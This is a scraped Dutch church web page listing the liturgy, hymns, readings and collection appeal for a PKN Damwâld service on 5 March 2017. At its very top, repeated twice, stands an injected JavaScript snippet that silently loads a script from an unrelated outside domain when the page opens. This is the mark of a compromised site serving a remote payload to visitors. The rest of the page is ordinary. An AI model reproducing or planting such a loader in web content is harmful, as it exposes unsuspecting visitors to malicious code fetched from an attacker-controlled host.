;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 maart 2017 9:30 uur - PKN Damwâld
zondag 5 maart 2017
09:30 uur

Kerkdienst zondag 5 maart 2017 9:30 uur

Thema: Jezus is 40 dagen in de woestijn

Informatie

Voorganger:Mw. G. v.d. Galiën
Organist:Ivo van Hijum
Thema:Jezus is 40 dagen in de woestijn
Liturgie
Lied voor de dienst Elb 178 : 1, 2, 3 en 4
DIENST VAN TOENADERING
Welkom en mededelingen
Intochtslied Psalm 91: 1,2,3
Stil gebed, Votum en Groet
We zingen: Psalm 91: 7,8
Drempelgebed
DIENST VAN HET WOORD
We zingen: Gezang 328 : 1, 2 en 3
Gebed om de Heilige Geest
We lezen: Deuteronomium 5: 1-16
We zingen: Gezang 31 : 1, 2, 3, 4 en 5
We lezen: Lucas 4: 1-13
We zingen: Gezang 172 : 1, 2, 3 en 4
Verkondiging
We zingen: Gezang 485 : 1, 2 en 3
DIENST VAN DE DANKBAARHEID
Geloofsbelijdenis
We zingen: Elb 351
Gebeden
Collecte
Slotlied Gezang 466 : 1, 2 en 3
Uitzending en Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: De Rudolphstichting

40Dagentijd: Steun kinderen en jongeren in de Glind
In Jeugddorp De Glind wonen kinderen en jongeren die vanwege diverse redenen niet meer thuis kunnen wonen. De Rudolphstichting biedt hun in De Glind een veilige leefomgeving. De kinderen en jongeren worden daar liefdevol opgevangen in gezinshuizen waar hun gezinshuisouders dag en nacht voor hen klaarstaan. Daarnaast zijn in De Glind diverse sportclubs en vrijetijdsvoorzieningen aanwezig. Zo ervaren de kinderen en jongeren de warmte en veiligheid van een thuis en hebben zij toegang tot alle faciliteiten om zich te kunnen ontwikkelen tot krachtige volwassenen. Voor 10 euro kan één kind een zwemles volgen. Uw gift maakt het mogelijk dat deze kinderen en jongeren een liefdevol thuis hebben en zich in een veilige omgeving kunnen ontwikkelen tot krachtige volwassenen. Doet u ook mee?

Tweede collecte: Kerk
Uitganscollecte: Kerk